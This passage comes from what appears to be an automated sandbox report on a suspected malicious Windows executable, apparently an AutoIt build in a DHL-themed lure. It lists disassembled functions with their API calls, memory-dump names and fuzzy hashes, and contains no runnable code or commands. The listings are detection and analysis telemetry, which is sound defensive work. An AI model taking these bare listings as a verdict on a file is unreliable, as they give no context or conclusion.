                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,007C0EE4,?,?), ref: 0081726E
                                                                                      • Part of subcall function 00816C35: CloseHandle.KERNEL32(00000000,?,0081727B,?,007C0EE4,?,?), ref: 00816C3F
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00817281
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,007C0EE4,?,?), ref: 00817288
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 4247c924159d192bf9ad8d3df281447ee24c1e07495192ac436f4bf8e98e7d9f
                                                                                    • Instruction ID: cb8e8bc782d952c5148766ed1fe39e2fe01ea14ec79e5b997564bfa88daf077c
                                                                                    • Opcode Fuzzy Hash: 4247c924159d192bf9ad8d3df281447ee24c1e07495192ac436f4bf8e98e7d9f
                                                                                    • Instruction Fuzzy Hash: 6BF08236940612EBE7122B64ED4CDDB777AFF89702B100935F743D10A2DBBA5855CB90
                                                                                    Function 00808992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0080899D
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 008089A9
                                                                                    • CloseHandle.KERNEL32(?), ref: 008089B2
                                                                                    • CloseHandle.KERNEL32(?), ref: 008089BA
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008089C3
                                                                                    • HeapFree.KERNEL32(00000000), ref: 008089CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: a5c058504347c3c57bc57e4273fbdf8750f29364d8d645e60887954a48696a45
                                                                                    • Instruction ID: ff923ee3af25bef5a8f45304f237921c488d8498cbaab7d9c1e8f30babbc456d
                                                                                    • Opcode Fuzzy Hash: a5c058504347c3c57bc57e4273fbdf8750f29364d8d645e60887954a48696a45
                                                                                    • Instruction Fuzzy Hash: 56E0C236404001FBDA022FE2EC0CD0ABB69FBC9322B108A30F31981171CB329424DB90
                                                                                    Function 008285ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00828613
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00828722
                                                                                    • VariantClear.OLEAUT32(?), ref: 0082889A
                                                                                      • Part of subcall function 00817562: VariantInit.OLEAUT32(00000000), ref: 008175A2
                                                                                      • Part of subcall function 00817562: VariantCopy.OLEAUT32(00000000,?), ref: 008175AB
                                                                                      • Part of subcall function 00817562: VariantClear.OLEAUT32(00000000), ref: 008175B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4237274167-1221869570
                                                                                    • Opcode ID: 305aa60b3386b0916dc367d155258426a7246d6b0af996c95282b3a84ae241ca
                                                                                    • Instruction ID: 4d3b0cf2de571f182e87596d50900276db9f3c2cfe9a728b0f5f7ec0c7a4b2b5
                                                                                    • Opcode Fuzzy Hash: 305aa60b3386b0916dc367d155258426a7246d6b0af996c95282b3a84ae241ca
                                                                                    • Instruction Fuzzy Hash: 3F912571608305DFCB10DF24C48499ABBE4FF89714F14896EF99ACB262DB31E945CB92
                                                                                    Function 00812A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
                                                                                    • _memset.LIBCMT ref: 00812B87
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00812BB6
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00812C69
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00812C97
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 4152858687-4108050209
                                                                                    • Opcode ID: 0e747cbf26e946cca7e966d311c767d49499e925e93d8fc26e3d1d062926f3d1
                                                                                    • Instruction ID: 089e766e6786045937de36f4eaeafa2ddb207beb3b60c62a7d48f32ddd83014a
                                                                                    • Opcode Fuzzy Hash: 0e747cbf26e946cca7e966d311c767d49499e925e93d8fc26e3d1d062926f3d1
                                                                                    • Instruction Fuzzy Hash: B851BF716083019FD7249F28D845AAFB7ECFF95320F040A2DF995D2291DB74CDA49792
                                                                                    Function 007C3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$_free
                                                                                    • String ID: 3c|$_|
                                                                                    • API String ID: 2620147621-1588047251
                                                                                    • Opcode ID: 0022003fa891d22516aa9de9f2b4fa2ef04b2d5ac320361585008637ef39747c
                                                                                    • Instruction ID: 0a966761f3327fdb0ddf07aaa4490540dbc060bed9af3b6051784dddd77e0336
                                                                                    • Opcode Fuzzy Hash: 0022003fa891d22516aa9de9f2b4fa2ef04b2d5ac320361585008637ef39747c
                                                                                    • Instruction Fuzzy Hash: D6515C716047418FDB29CF28C450B6EBBF5BF85314F44892DE99987351E739E901CB82
                                                                                    Function 007C6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$_memmove
                                                                                    • String ID: 3c|$ERCP
                                                                                    • API String ID: 2532777613-4015162898
                                                                                    • Opcode ID: 0f99e0a635f238af41b0273c455d7142fbfd881b67d851306655d89a4e7a48ca
                                                                                    • Instruction ID: 63d9ad42eb1ffdd876964495b7300335da26eff8131f693ec542349a7f41a5e2
                                                                                    • Opcode Fuzzy Hash: 0f99e0a635f238af41b0273c455d7142fbfd881b67d851306655d89a4e7a48ca
                                                                                    • Instruction Fuzzy Hash: 7851B070A00309DBDB24CFA5C985BAAB7F4FF04304F20456EE94ACB281E774EA44CB50
                                                                                    Function 0080D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0080D5D4
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0080D60A
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0080D61B
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0080D69D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: 036d66b9056c67dc27efe800ce1a4f456201942d0792610b60129de13d16b3ec
                                                                                    • Instruction ID: 8ce06f23b3cc4c3ff87faece72ae05314bf5c73b94f527e81036767e8d20ac25
                                                                                    • Opcode Fuzzy Hash: 036d66b9056c67dc27efe800ce1a4f456201942d0792610b60129de13d16b3ec
                                                                                    • Instruction Fuzzy Hash: F5418BB1600304EFDB45CFA4CC84A9ABBA9FF54314F1181A9A909DF286D7B2D944CBE0
                                                                                    Function 00812753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 008127C0
                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008127DC
                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00812822
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00875890,00000000), ref: 0081286B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    • Opcode ID: 430585f5f2b3c4a493658e9baa9a85cdba38b1c879cb24f2d91fc295c7063ac4
                                                                                    • Instruction ID: ba4a2c603cd9b55beca8205aaf29cea767e54655566420c5a006be2503b9fe80
                                                                                    • Opcode Fuzzy Hash: 430585f5f2b3c4a493658e9baa9a85cdba38b1c879cb24f2d91fc295c7063ac4
                                                                                    • Instruction Fuzzy Hash: 5141AE716043419FDB24DF28C844B9ABBE8FF85314F04492DF9A6D72D2D730A855CB52
                                                                                    Function 0082D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0082D7C5
                                                                                      • Part of subcall function 007B784B: _memmove.LIBCMT ref: 007B7899
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower_memmove
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 3425801089-567219261
                                                                                    • Opcode ID: 3d32b102fcb65d8cd8e58f209a12935697c4b52a9c32fd3a0b977110438e3f0f
                                                                                    • Instruction ID: 675197595120c6d6ac40e483eefbeba47b2fde111fd3968afdab4525d0eaa84e
                                                                                    • Opcode Fuzzy Hash: 3d32b102fcb65d8cd8e58f209a12935697c4b52a9c32fd3a0b977110438e3f0f
                                                                                    • Instruction Fuzzy Hash: 1931AF71A04219EBCF04EF58C855AEEB7B4FF44324B108A2AE875D77D1DB71A949CB80
                                                                                    Function 00808E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00808F14
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00808F27
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00808F57
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 365058703-1403004172
                                                                                    • Opcode ID: 5e9ea140068764b21b35a6ec5a52cbd64aee1059582b8a8ffae2ee4e9fffe2c0
                                                                                    • Instruction ID: 4b25ced4b167962c5fe28a1c40c778ac2f39f700707891280278f01e4530c760
                                                                                    • Opcode Fuzzy Hash: 5e9ea140068764b21b35a6ec5a52cbd64aee1059582b8a8ffae2ee4e9fffe2c0
                                                                                    • Instruction Fuzzy Hash: C221F271A00109FADB18ABB0CC4AEFFB769EF55360F044529F461E72E1DE390849DA50
                                                                                    Function 0082182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0082184C
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00821872
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008218A2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 008218E9
                                                                                      • Part of subcall function 00822483: GetLastError.KERNEL32(?,?,00821817,00000000,00000000,00000001), ref: 00822498
                                                                                      • Part of subcall function 00822483: SetEvent.KERNEL32(?,?,00821817,00000000,00000000,00000001), ref: 008224AD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 3113390036-3916222277
                                                                                    • Opcode ID: 782c5e0e7c319f8d3fdf303ac7114d512fb57213027c8eb787d1e2b9a6b4b8e4
                                                                                    • Instruction ID: a157611a7e50ae48540bab876330d8e6c5ee0b0fda45364a804cf58505eb1501
                                                                                    • Opcode Fuzzy Hash: 782c5e0e7c319f8d3fdf303ac7114d512fb57213027c8eb787d1e2b9a6b4b8e4
                                                                                    • Instruction Fuzzy Hash: 6D21D0B1500318BFEB119B64ECC9EBB77ECFB99744F20413AF905D2240EA218D4497A1
                                                                                    Function 008363E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
                                                                                      • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
                                                                                      • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00836461
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00836468
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0083647D
                                                                                    • DestroyWindow.USER32(?), ref: 00836485
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 4146253029-1011021900
                                                                                    • Opcode ID: 82835b78f6896db152fa763603c985c225198ea3ca9b1579966f22cf429b7a50
                                                                                    • Instruction ID: a024d2aa0ca8286e5667c64c66a90ec12ba411ead33af6be7c82178aec988a5f
                                                                                    • Opcode Fuzzy Hash: 82835b78f6896db152fa763603c985c225198ea3ca9b1579966f22cf429b7a50
                                                                                    • Instruction Fuzzy Hash: 84218E71A00205BBEF104F68EC44EBA77ADFB99368F108629FA10D6191E771DC6197A4
                                                                                    Function 00816D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00816DBC
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00816DEF
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00816E01
                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00816E3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: 04155d38abb30a3b6eef693419ebbfb218621c68ab264e4f34e771327ebd2096
                                                                                    • Instruction ID: 181400c07c6af9c355068cd10ac6f14c277bcb1bd8cf8117a1d814cabc0acbf7
                                                                                    • Opcode Fuzzy Hash: 04155d38abb30a3b6eef693419ebbfb218621c68ab264e4f34e771327ebd2096
                                                                                    • Instruction Fuzzy Hash: C7215175600209ABDB209F29EC05ADA77E8FF84760F204A19FDE1D72D0E77199A4DB50
                                                                                    Function 00816E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00816E89
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00816EBB
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00816ECC
                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00816F06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: db8e7db3d5f615a4e0de9d1c443741abf06f6e90ad404c73abd9f0dc21049ffb
                                                                                    • Instruction ID: e6a5307d480f815a3ca5a4980b19c8d603c5144733ebbf3608e460951059cb83
                                                                                    • Opcode Fuzzy Hash: db8e7db3d5f615a4e0de9d1c443741abf06f6e90ad404c73abd9f0dc21049ffb
                                                                                    • Instruction Fuzzy Hash: A72151B5500315DBDB209F69D804AEA77ACFF45724F300B19F9E1D72D0E77098A18761
                                                                                    Function 0081AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0081AC54
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0081ACA8
                                                                                    • __swprintf.LIBCMT ref: 0081ACC1
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0083F910), ref: 0081ACFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
